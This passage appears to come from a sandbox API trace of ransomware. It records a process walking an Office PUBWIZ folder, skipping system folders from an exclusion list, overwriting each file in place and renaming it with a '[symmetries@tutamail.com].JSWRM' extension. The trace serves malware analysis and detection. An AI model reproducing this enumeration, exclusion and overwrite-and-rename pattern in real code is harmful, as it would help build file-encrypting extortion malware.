lpWideCharStr="BS2BARB.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS2BARB.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS2BARB.POC", lpUsedDefaultChar=0x0) returned 11 [0140.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS2BARB.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS2BARB.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS2BARB.POC", lpUsedDefaultChar=0x0) returned 11 [0140.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BS2BARB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bs2barb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.630] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2600) returned 1 [0140.630] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.630] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa20, lpOverlapped=0x0) returned 1 [0140.632] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.632] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa20, lpOverlapped=0x0) returned 1 [0140.632] CloseHandle (hObject=0x238) returned 1 [0140.632] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BS2BARB.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bs2barb.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BS2BARB.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bs2barb.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.633] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21889f0d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21889f0d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa26, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BS4BOXES.POC", cAlternateFileName="")) returned 1 [0140.633] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2=".") returned 1 [0140.633] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2="..") returned 1 [0140.633] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2="...") returned 1 [0140.633] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2="windows") returned -1 [0140.633] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2="recovery") returned -1 [0140.633] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2="perflogs") returned -1 [0140.633] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2="documents and settings") returned -1 [0140.633] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.634] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2="system volume information") returned -1 [0140.634] lstrcmpiW (lpString1="BS4BOXES.POC", lpString2="msocache") returned -1 [0140.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS4BOXES.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS4BOXES.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS4BOXES.POC", lpUsedDefaultChar=0x0) returned 12 [0140.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS4BOXES.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS4BOXES.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS4BOXES.POC", lpUsedDefaultChar=0x0) returned 12 [0140.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BS4BOXES.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bs4boxes.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.635] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2598) returned 1 [0140.635] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.635] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0xa20, lpOverlapped=0x0) returned 1 [0140.636] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.636] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0xa20, lpOverlapped=0x0) returned 1 [0140.636] CloseHandle (hObject=0x238) returned 1 [0140.637] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BS4BOXES.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bs4boxes.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BS4BOXES.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bs4boxes.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.637] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21889f0d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21889f0d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BS53BOXS.POC", cAlternateFileName="")) returned 1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2=".") returned 1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2="..") returned 1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2="...") returned 1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2="windows") returned -1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2="recovery") returned -1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2="perflogs") returned -1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2="documents and settings") returned -1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2="system volume information") returned -1 [0140.638] lstrcmpiW (lpString1="BS53BOXS.POC", lpString2="msocache") returned -1 [0140.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS53BOXS.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS53BOXS.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS53BOXS.POC", lpUsedDefaultChar=0x0) returned 12 [0140.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS53BOXS.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS53BOXS.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS53BOXS.POC", lpUsedDefaultChar=0x0) returned 12 [0140.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BS53BOXS.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bs53boxs.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.639] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1024) returned 1 [0140.639] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.639] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x400, lpOverlapped=0x0) returned 1 [0140.640] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.640] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x400, lpOverlapped=0x0) returned 1 [0140.641] CloseHandle (hObject=0x238) returned 1 [0140.641] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BS53BOXS.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bs53boxs.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BS53BOXS.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bs53boxs.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.642] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21889f0d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21889f0d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21889f0d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12c2a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BZCARD11.POC", cAlternateFileName="")) returned 1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2=".") returned 1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2="..") returned 1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2="...") returned 1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2="windows") returned -1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2="recovery") returned -1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2="perflogs") returned -1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2="documents and settings") returned -1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2="system volume information") returned -1 [0140.642] lstrcmpiW (lpString1="BZCARD11.POC", lpString2="msocache") returned -1 [0140.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCARD11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCARD11.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BZCARD11.POC", lpUsedDefaultChar=0x0) returned 12 [0140.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCARD11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCARD11.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BZCARD11.POC", lpUsedDefaultChar=0x0) returned 12 [0140.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCARD11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcard11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.644] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=76842) returned 1 [0140.644] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.644] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12c20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x12c20, lpOverlapped=0x0) returned 1 [0140.650] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.650] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12c20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x12c20, lpOverlapped=0x0) returned 1 [0140.650] CloseHandle (hObject=0x238) returned 1 [0140.650] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCARD11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcard11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCARD11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcard11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.651] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218b0166, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218b0166, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218b0166, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe6f8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BZCARDHM.POC", cAlternateFileName="")) returned 1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2=".") returned 1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2="..") returned 1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2="...") returned 1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2="windows") returned -1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2="recovery") returned -1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2="perflogs") returned -1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2="documents and settings") returned -1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2="system volume information") returned -1 [0140.651] lstrcmpiW (lpString1="BZCARDHM.POC", lpString2="msocache") returned -1 [0140.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCARDHM.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.651] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCARDHM.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BZCARDHM.POC", lpUsedDefaultChar=0x0) returned 12 [0140.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCARDHM.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCARDHM.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BZCARDHM.POC", lpUsedDefaultChar=0x0) returned 12 [0140.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCARDHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcardhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.652] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=59128) returned 1 [0140.652] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.653] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe6f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xe6f0, lpOverlapped=0x0) returned 1 [0140.658] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.658] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe6f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xe6f0, lpOverlapped=0x0) returned 1 [0140.658] CloseHandle (hObject=0x238) returned 1 [0140.658] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCARDHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcardhm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCARDHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\bzcardhm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.659] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21889f0d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21889f0d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21889f0d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6214, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="BZCD98SP.POC", cAlternateFileName="")) returned 1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2=".") returned 1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2="..") returned 1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2="...") returned 1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2="windows") returned -1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2="recovery") returned -1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2="perflogs") returned -1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2="documents and settings") returned -1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2="system volume information") returned -1 [0140.659] lstrcmpiW (lpString1="BZCD98SP.POC", lpString2="msocache") returned -1 [0140.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCD98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCD98SP.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BZCD98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0140.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCD98SP.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BZCD98SP.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BZCD98SP.POC", lpUsedDefaultChar=0x0) returned 12 [0140.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\BZCD98SP.POC" 